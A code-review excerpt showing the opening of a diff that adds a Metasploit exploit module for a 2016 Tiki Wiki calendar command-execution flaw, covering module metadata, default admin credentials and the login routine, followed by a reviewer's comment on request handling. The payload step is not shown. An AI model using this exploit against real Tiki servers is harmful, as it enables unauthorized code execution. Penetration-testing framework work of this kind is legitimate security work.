modules/exploits/linux/http/tiki_calendar_exec.rb

```diff
@@ -0,0 +1,153 @@
+          Verified/Tested against 14.1
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@shorebreaksecurity.com>', # module
+            'Dany Ouellet'                          # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39965' ],
+            [ 'URL', 'https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => %w( php ),
+        'Privileged'     => false,
+        'Arch'           => ARCH_PHP,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Jun 06 2016'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of Tiki-Wiki', '/']),
+        OptString.new('USERNAME',  [ false, 'Username of a user with calendar access', 'admin']),
+        OptString.new('PASSWORD',  [ false, 'Password of a user with calendar access', 'admin'])
+      ], self.class
+    )
+  end
+
+  # returns cookie regardless of outcome
+  def authenticate
+    begin
+      # get a cookie to start with
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'tiki-login_scr.php'),
+        'method'    => 'GET'
+      )
+      cookie = res.get_cookies
+      # if we have creds, login with them
+      vprint_status('Attempting Login')
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'tiki-login.php'),
+        'method'    => 'POST',
+        'ctype'     => 'application/x-www-form-urlencoded',
+        'cookie'    => cookie,
+        'vars_post' =>
+          {
+            'user'                     => datastore['USERNAME'],
+            'pass'                     => datastore['PASSWORD'],
+            'login'                    => '',
+            'stay_in_ssl_mode_present' => 'y',
+            'stay_in_ssl_mode'         => 'n'
+          }
+      )
+      if res && res.redirect? && res.redirection.to_s.end_with?('tiki-login_scr.php')
+        fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      elsif res && res.redirect?
+        vprint_status("Verifying login... Visiting redirect to: #{res.redirection}")
+        res = send_request_cgi(
+          'uri'       => res.redirection.to_s,
+          'method'    => 'GET',
+          'cookie'    => cookie
+        )
+        # double check auth worked and we got a Log out on the page.
+        # at times I got it to auth, but then it would give permission errors
+        # so we want to try to double check everything is good
+        unless res.body =~ /Log out/
+          fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
```

Comment:
Instead of using send_request_cgi twice, why not use send_request_cgi! and then check res.body at the end whether the login was successful or not?